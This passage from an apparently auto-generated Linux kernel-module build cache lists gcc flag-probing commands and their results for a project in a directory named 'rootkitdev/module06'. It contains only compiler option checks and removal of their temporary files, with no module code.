__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wunused-but-set-variable_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-unused-but-set-variable";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-unused-but-set-variable 52 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wunused-const-variable_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-unused-const-variable";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-unused-const-variable 53 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls__-fno-var-tracking-assignments_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-fno-var-tracking-assignments";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-var-tracking-assignments 54 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments__-mfentry_-DCC_USING_FENTRY_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-mfentry_-DCC_USING_FENTRY";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mfentry -DCC_USING_FENTRY 55 | __cached_gcc_-print-file-name_include := /usr/lib/gcc/x86_64-linux-gnu/7/include 56 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wdeclaration-after-statement";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wdeclaration-after-statement 57 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wpointer-sign_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-pointer-sign";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-pointer-sign 58 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wstringop-truncation_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-stringop-truncation";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 59 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-strict-overflow";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-strict-overflow 60 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-merge-all-constants";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-merge-all-constants 61 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fmerge-constants";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fmerge-constants 62 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-stack-check";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-stack-check 63 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fconserve-stack";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fconserve-stack 64 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_implicit-int";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=implicit-int 65 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_strict-prototypes";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=strict-prototypes 66 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-